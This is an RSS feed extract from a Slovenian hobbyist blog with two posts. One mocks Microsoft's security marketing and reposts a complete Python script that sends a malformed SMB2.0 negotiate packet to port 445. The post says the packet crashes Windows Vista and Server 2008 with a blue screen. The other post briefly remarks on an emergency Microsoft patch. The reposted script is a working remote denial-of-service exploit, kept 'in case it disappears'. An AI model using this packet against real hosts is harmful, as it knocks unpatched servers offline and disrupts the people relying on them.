Another day in a geek's life » exploit http://www.mulaz.org/blog question = 2b || !2b; Tue, 10 Jan 2012 14:12:50 +0000 en hourly 1 http://wordpress.org/?v=3.3.1 Windows 7, security, Linux, patchi, in en 0-day http://www.mulaz.org/blog/2009/09/08/windows-7-security-linux-patchi-in-en-0-day/ http://www.mulaz.org/blog/2009/09/08/windows-7-security-linux-patchi-in-en-0-day/#comments Tue, 08 Sep 2009 17:45:06 +0000 mulaz http://www.mulaz.org/blog/?p=690 Pred par dnevi je na slashdotu pojavil topic1  o Microsoftovih training slajdih, kjer so BestBuy zaposlene izobraževali kok je Win7 "ql", in kok je Linux "beden".  Konkreten slajd, ki mi je privlekel pozornost je bil tudi:

Linux11 security

Torej... ko pride do kakega grdega b00ga, exploita ipd, so userji "on their own", če uporabljajo Microsoft priozvode, so pa "safe and secure"...

No in danes mi je @Kostko poslal zanimiv link (click here), kjer se nahaja kratka python skripta, ki na oddaljeni mašini sproži BSOD.  In kako je sedaj z 'zagarantirano varnostjo'? Citiram:

Vendor contacted, but no patch available for the moment. Close SMB feature and ports, until a patch is provided.

Hmm.. očitno bo najbolje da izklopimo M$ file serverje, zakurimo ogenj in čakamo :)

In za vsak slučaj, da ne bi exploit kam izginil, dajem kopijo sem:

#!/usr/bin/python
# When SMB2.0 recieve a "&" char in the "Process Id High" SMB header field it dies with a
# PAGE_FAULT_IN_NONPAGED_AREA from socket import socket
from time import sleep
 
host = "IP_ADDR", 445
buff = (
"\x00\x00\x00\x90" # Begin SMB header: Session message
"\xff\x53\x4d\x42" # Server Component: SMB
"\x72\x00\x00\x00" # Negociate Protocol
"\x00\x18\x53\xc8" # Operation 0x18 & sub 0xc853
"\x00\x26"# Process ID High: --> :) normal value should be "\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xfe"
"\x00\x00\x00\x00\x00\x6d\x00\x02\x50\x43\x20\x4e\x45\x54"
"\x57\x4f\x52\x4b\x20\x50\x52\x4f\x47\x52\x41\x4d\x20\x31"
"\x2e\x30\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00"
"\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66\x6f\x72\x20\x57"
"\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e\x31\x61"
"\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c"
"\x4d\x20\x30\x2e\x31\x32\x00\x02\x53\x4d\x42\x20\x32\x2e"
"\x30\x30\x32\x00"
 
)
s = socket()
 
s.connect(host)
s.send(buff)
s.close()

ps:  zadeva se je pojavila tudi na slashdotu (click here)

pps:

(21:19:09) Anze: na zobavniku potrjeno bsod dela na visti
(21:19:12) Anze: win7 je safe <--????
(21:19:16) Anze: win 2k8 pade

  1. zaradi photobucketa se slik več ne vidi, zato sem postavil mirror tule
]]> http://www.mulaz.org/blog/2009/09/08/windows-7-security-linux-patchi-in-en-0-day/feed/ 0 Microsoft releases emergency patch for 0day exploits http://www.mulaz.org/blog/2008/10/27/microsoft-releases-emergency-patch-for-0day-exploits/ http://www.mulaz.org/blog/2008/10/27/microsoft-releases-emergency-patch-for-0day-exploits/#comments Mon, 27 Oct 2008 13:13:28 +0000 mulaz http://www.mulaz.org/blog/?p=345 Očitno je M$ spet naredil sranje... remote code execution :) zakon :)

Me prov zanima kje use se že nahajajo exploiti :)

LINK

]]> http://www.mulaz.org/blog/2008/10/27/microsoft-releases-emergency-patch-for-0day-exploits/feed/ 0